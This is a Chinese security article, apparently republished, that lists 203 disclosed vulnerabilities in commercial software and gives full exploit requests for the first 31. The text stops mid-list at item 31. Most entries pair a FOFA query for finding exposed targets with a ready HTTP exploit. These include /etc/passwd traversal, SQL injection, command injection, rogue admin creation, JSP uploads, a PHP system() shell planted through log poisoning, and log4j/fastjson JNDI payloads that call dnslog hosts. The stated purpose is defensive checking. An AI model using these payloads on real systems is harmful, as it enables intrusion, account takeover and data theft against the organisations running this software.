Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is sourced from 网络安全新视界, author 网络安全新视界.

Purpose: Exploitation of N-day vulnerabilities makes up a large share of attacks in offensive and defensive security operations, and we hope this article helps with your defence. Defenders can use its contents to carry out risk checks.

Vulnerability sources: This article covers 203 PoCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.
Security patches: All of the vulnerabilities are public; for patches or remediation guidance, please contact the product vendor.
Article content: Due to length constraints, a few PoCs that are too long are replaced with the word PAYLOAD; search for the complete PoC yourself if you need it.

Legal rights: If any content in this article infringes on a party's legitimate rights, please contact the 网络安全新视界 team through the account backend to have the relevant content removed.


Statement

To simplify the process and make browsing easier, there is no "reply to receive the full list". This article is the most complete version available; when using it, press F12 and search for keywords.
Bookmark this article if you need it. You can also follow this public account (网络安全新视界).


Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP (jshERP) getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service washing machine RCE
87. DBAppSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload


PoC List

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the backend with the default account admin, perform the following operation:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=cookie obtained from the login in step 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"

------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


Step 2: POST request; the injected function executes a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Step 3: send the following request to the lab target to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP (jshERP) getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}


22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}


24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Then request:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Version: <=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
